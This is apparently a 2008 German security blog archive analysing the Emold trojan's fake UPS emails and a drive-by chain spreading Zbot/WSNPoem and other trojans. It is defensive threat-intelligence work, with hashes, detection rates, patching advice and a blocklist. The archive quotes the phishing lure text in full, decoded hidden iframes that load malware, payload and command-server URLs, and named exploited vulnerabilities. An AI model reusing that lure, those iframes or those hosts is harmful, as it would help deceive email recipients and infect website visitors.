Monthly Archive for September, 2008

Emold: [NO-REPLY] UPS Tracking Number

Wir haben ihn schon fast vermisst: Emold aka AutoRun. Seit heute Nachmittag kurz nach 15:00 Uhr verbreitet er sich wieder einmal mehr als gefälschte UPS Rechnung:

From: United Postal Service
Betreff: [NO-REPLY] UPS Tracking Number 62576501

Unfortunately we were not able to deliver postal package you sent on Sept the 18 in time
because the recipients address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Der E-Mail Text ist immer der selbe wobei die Tracking Number im Betreff variiert.
Im Attachement UPSLetter.zip ist der Trojaner Emold (AutoRun) zu finden (UPS_letter.doc.exe):

Filename : UPS_letter.doc.exe
File size: 37888 bytes
MD5…: efbcebc53063fdff81723c894978626b
SHA1..: c7705862fcf53956df383e44433e9812b430e26e
Erkennungsrate: 14/36 (38.89%)

Am Verhalten des Trojaners nach der infektion hat sich nichts geändert (Siehe Post: Emold: eTicket_I2.zip).

UPDATE 1.10.08

Kaum ein Tag vergangen, flutet der Trojaner Emold heute seit kurz nach 12:30 Uhr erneut die E-Mail Postfächer von Schweizer Bürgern. E-Mail Text und Betreff sind der selbe, nur das Attachement unterscheidet sich von dem gestrigen und beinhaltet eine aktuelle Variante des Trojaners:

Filename: UPS_LETTER_N839925.doc.exe
File size: 40448 bytes
MD5…: 54475a28e6bf52d9d126e63865ebd96a
SHA1..: c9f8c76ebd30cfb505ec01c986e0582fcc96a0d7
Erkennungsrate: 10/36 (27.78%)

UPDATE 3.10.08

Und gleich noch einer:

Filename: UPS_letter.doc.exe
File size: 42496 bytes
MD5…: 3dd62cac84240e01681cf5887e0ee5da
SHA1..: eb74a9252bbdc085b91598e51c92e4e742d08db6
Erkennungsrate: 5/38 (13.89%)

UPDATE 7.10.08

Und weil es so schön ist gleich nocheinmal:

Filename: UPS_letter.doc.exe
File size: 43520 bytes
MD5…: 98fcb400970764bfac71e54c7da3b0b6
SHA1..: a43e160049162b870cea08989048d095ad65a6e1
Erkennungsrate: 7/36 (19.45%)

wsnpoem per DriveBy-Infektion

Ich berichtete in der vergangenen Woche über die Domain mncpssa.org, welche vom Trojaner Emold / AutoRun kontaktiert wird, um den Spam-Mailer PushDo nachzuladen (Siehe Post Emold: Statement.zip). Nun bin ich auf eine interessante Entdeckung gestossen:

Die Domain mncpssa.org zeigt auf den Server mit der IP Adresse 202.191.62.252. Auf demselben Server werden noch drei andere Domains gehostet:

  • cfohello.com.au
  • dadsplace.com.au
  • moreaccess4me.com
  • Was sofort auffällt ist, dass auf der Frontseite dieser Domains sowie auch auf den Unterseiten verdächtige IFrames platziert sind. Ich habe mir deshalb die beiden IFrames, welche auf der Websiete mncpssa.org platziert sind etwas genauer angeschaut:

    IFrame I (utevox.site90.com)

    Der erste IFrame ist in einem obfuskierten Javascript Code versteckt, welcher nach dem Decoden wie folgt aussieht:

    <iframe src=”http:\/\/utevox.site90.com\/f\/index.php” width=”7″ height=”8″ style=”display:none”><\/iframe>

    Dieser erste (obfuskierte) IFrame liefert dem Besucher den Banken-Trojaner WSNPoem (aka Zbot):

    GET http://utevox.site90.com/f/load.php?id=15835&spl=2

    Filename: load.exe
    File size: 47616 bytes
    MD5…: 9420e8e17da3f02e65f27029acf0cfb6
    SHA1..: 3358e8d5bbc95543b6c44896ea946c57ac265cbe
    Erkennungsrate: 23/36 (63.89%)

    Führt man die Datei aus, erstellt die Malware das wsnpoem Verzeichnis sowie die Datei ntos.exe. Mysteriös an dem ganze ist jedoch, dass WSNPoem plötzlich wieder die “alten” Datei- & Verzeichnisnamen verwendet und nicht diejenigen, welche er in der letzten Spam-Welle vom 9. September verwendet hat (Siehe wsnpoem: IPLOGS.zip). Nach der Infektion kontaktiert der Banken-Trojaner die Domain phpnet77.com und holt sich das aktuelle Config-File::

    GET http://phpnet77.com/cfg.bin

    Danach meldet er sich regelmässig über einen PHP-Script beim Server:

    GET http://phpnet77.com/admin66/s.php

    Die Domain ist in keiner der uns bekannten wsnpoem Netblocks (89.187.32.0/19 und 91.203.92.0/22) gehostet sondern bei Yahoo:

    ;; ANSWER SECTION:
    phpnet77.com. 1200 IN A 68.180.151.80
    phpnet77.com. 1200 IN A 68.180.151.27
    phpnet77.com. 1200 IN A 68.180.151.28
    phpnet77.com. 1200 IN A 68.180.151.29
    phpnet77.com. 1200 IN A 68.180.151.30
    phpnet77.com. 1200 IN A 68.180.151.31

    OrgName: Yahoo
    NetRange: 68.180.128.0 – 68.180.255.255
    CIDR: 68.180.128.0/17
    NetName: A-YAHOO-US6

    IFrame II (life-tablets.cn)

    Der zweite IFrame auf der Frontseite erscheint im Klartext:

    <iframe src=”http://life-tablets.cn/tds/index.php” style=”visibility: hidden; display: none”></iframe>

    Nun wird es kompliziert. Ruft man die URL auf, bekommt man ein HTTP 302 (Moved Temorarily) zurück und wird umgeleitet nach:

    http://life-tablets.cn/fi/index.php

    Hier wird nun ein langer Javescript-Code ausgeführt welcher versucht, insgesamt 17 Schwachstellen in verschiedenen Applikationen auszunutzen. Hier ein paar Beispiele:

  • IE ADODB.Stream Object File Installation Weaknes
  • IE WebViewFolderIcon setSlice Overflow
  • MS DirectAnimation ActiveX Vulnerability
  • MS Snapshot Viewer Remote Code Execution
  • MS WksPictureInterface Property Remote DoS
  • Ourgame ActiveX control IEStartNative() buffer overflow
  • Apple Quicktime RTSP URL Handling Buffer Overflow
  • uvm…
  • Ist das ausnützen einer Schwachstelle erfolgreich, infiziert das Script den Besucher mit einer Malware:

    GET http://life-tablets.cn/fi/load.php?id=0

    Filename: load.exe
    File size: 41984 bytes
    MD5…: a7e348da297e9d9a4358aad83dca2c53
    SHA1..: 4aed6b043b0b51726d6b21421058269d8fe91201
    Erkennungsrate: 20/36 (55.56%)

    Nun wird der Besucher erneut mittels einem HTTP 302 Moved Temorarily nach http://fstat.cn/in.cgi?id110 umgeleitet und danach gleich ein weiteres mal nach http://59.125.229.78/tube/in.php. Hier wird nun erneut Schadcode mittels eingebundenen IFrames ausgeführt:

    <iframe src=”http://59.125.229.78/tube/7/index.php” width=1 height=1 style=”visibility: hidden”></iframe>

    <iframe src=”http://fstat.cn/in.cgi?idb1″ width=1 height=1 style=”visibility: hidden”></iframe>

    <iframe src=”http://fstat.cn/tds/in.cgi?default” width=1 height=1 style=”visibility: hidden”></iframe>

    Der erste Link (59.125.229.78) führt dasselbe Script wie bereits oben erwähnt nochmals aus, jedoch ist das Script an einer anderen Stelle gehostet und ein paar Parameter sind abgeändert. Dabei wird uns nach erfolgreichem Ausnützen einer Sicherheitslücke erneut eine weitere Ausführbare Datei Namens load.exe untergejubelt:

    GET http://life-tablets.cn/fi/load.php?id=1916&spl=1

    Filename: load.exe

    http://www.virustotal.com/de/analisis/9e525f9323f7082a5592ff6e458761ea

    File size: 23040 bytes
    MD5…: cb129b294b66fc17cef9f447b35e85e9
    SHA1..: b67259704e4ba5aaae672232d8957e91221c8a0
    Erkennungsrate: 18/36 (50%)

    Die Malware kontaktiert nach der Infektion folgende URLs:

    http://belgius.net/main/controller.php?action=bot

    http://213.115.4.160/polls/get.php

    http://sobalyaki.net/gate/gate.php

    Die beiden letzten IFrames leiten den Besucher schlussendlich zu msn.com und google.com weiter.

    Fazit

    Wir haben eine einzige URL besucht und dabei gleich drei verschiedene Trojaner eingefangen:

    load.exe (cb129b294b66fc17cef9f447b35e85e9 Trojan.Meredrop)
    load.exe (a7e348da297e9d9a4358aad83dca2c53 Win32.Momibot)
    load.exe (9420e8e17da3f02e65f27029acf0cfb6 Zbot/wsnpoem)

    Interessant ist dabei vor Allem Eines: Die Kriminellen hinter WSNPoem scheinen nun neu auch auf DriveBy-Infektionen zu setzten, um ihren Banken-Trojaner unter das Volk zu mischen – wobei es im Moment unklar ist, ob sich hinter dieser neuen WSNPoem Variante um dieselbe Gang handelt wie in den früheren Fällen, oder um eine von ihnen unabhängige Täterschaft. Dies ist problematisch, weil eine Verbreitung über DriveBy-Infektionen heimtückischer ist als über Spam-Mails. Dies zeigt, wie wichtig es ist, die Browser auf einem aktuellen Patchstand zu halten, ein Mimimum an Plugins einzusetzen (denn die sind der Hauptangriffsvektor von DriveBy-Infektionen, nicht mehr der Browser selber), und auch diese auf aktuellem Stand zu halten. Für Firewall-Betreiber empfiehlt es sich, den Zugang zu den folgenden URLs/IPs zu sperren, respektive Lofiles auf Zugriffe auf diese URLs zu scannen:

    utevox.site90.com
    mncpssa.org
    cfohello.com.au
    dadsplace.com.au
    moreaccess4me.com
    phpnet77.com
    life-tablets.cn
    59.125.229.78
    fstat.cn
    belgius.net
    213.115.4.160
    sobalyaki.net
    stabroom.cn
    mp3dowl.com
    69.72.149.7
    78.109.16.218
    78.109.30.5
    yanndex.su
    lobanabucks.cn



    economics-recluse
    Scene
    Urgent!